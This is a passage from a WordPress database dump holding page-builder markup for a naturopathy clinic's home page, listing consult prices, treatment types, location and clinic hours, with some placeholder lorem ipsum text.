icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Nulla quis\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Sed porttitor\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Curabitur nulla\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\" sticky_enabled=\"0\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Quisque velit\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Proin eget\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Nulla porttitor\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" column_structure=\"1_3,1_3,1_3\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_3\"][/et_pb_column][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_3\"][/et_pb_column][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_3\"][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"4_4\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-120px||||false|false\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_3\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Initial consult (90 min) - $120\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01.jpg\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" title_text=\"Icon\" sticky_enabled=\"0\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Return consult (50 min) - $80\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/5-01.jpg\" _builder_version=\"4.9.4\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" title_text=\"5-01\" sticky_enabled=\"0\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][et_pb_blurb image_last_edited=\"off|tablet\" _builder_version=\"4.9.4\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_blurb][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\" custom_padding=\"||0px|||\" sticky_enabled=\"0\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_5\"][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-7.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-1.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-4.png\" image_last_edited=\"off|phone\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"]<ul>\n<li>Stress strategies</li>\n<li>Exercise and movement</li>\n<li>Mindfulness </li>\n<li>Sleep support</li>\n</ul>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-5.png\" image_last_edited=\"off|phone\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<ul>\n<li>Flower <span style=\"font-family: Montserrat;\">essences</span> </li>\n</ul>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.4.8\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Don\'t wait to make the shift to a more holistic approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Cras ultricies ligula sed magna dictum porta. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec rutrum congue leo eget malesuada. Nulla porttitor accumsan tincidunt. Curabitur aliquet quam id dui posuere blandit. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia.</span></p>\n<p><span style=\"font-family: Montserrat;\">Donec rutrum congue leo eget malesuada. Vivamus suscipit tortor eget felis porttitor volutpat. Pellentesque in ipsum id orci porta dapibus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Curabitur aliquet quam id dui posuere blandit. Quisque velit nisi, pretium ut lacinia in elementum.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.4.8\" background_color=\"#f6ddd7\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-24.png\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\"][et_pb_image title_text=\"Icon\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_text=\"View Calendar\" button_alignment=\"center\" _builder_version=\"4.4.8\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Book Now\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; font-weight: normal;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-24 12:58:23','2021-05-24 04:58:23','',28,'https://verde.desidrivers.com.au/?p=103',0,'revision','',0),(105,1,'2021-05-24 13:08:59','2021-05-24 05:08:59','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||180px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#000000\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" 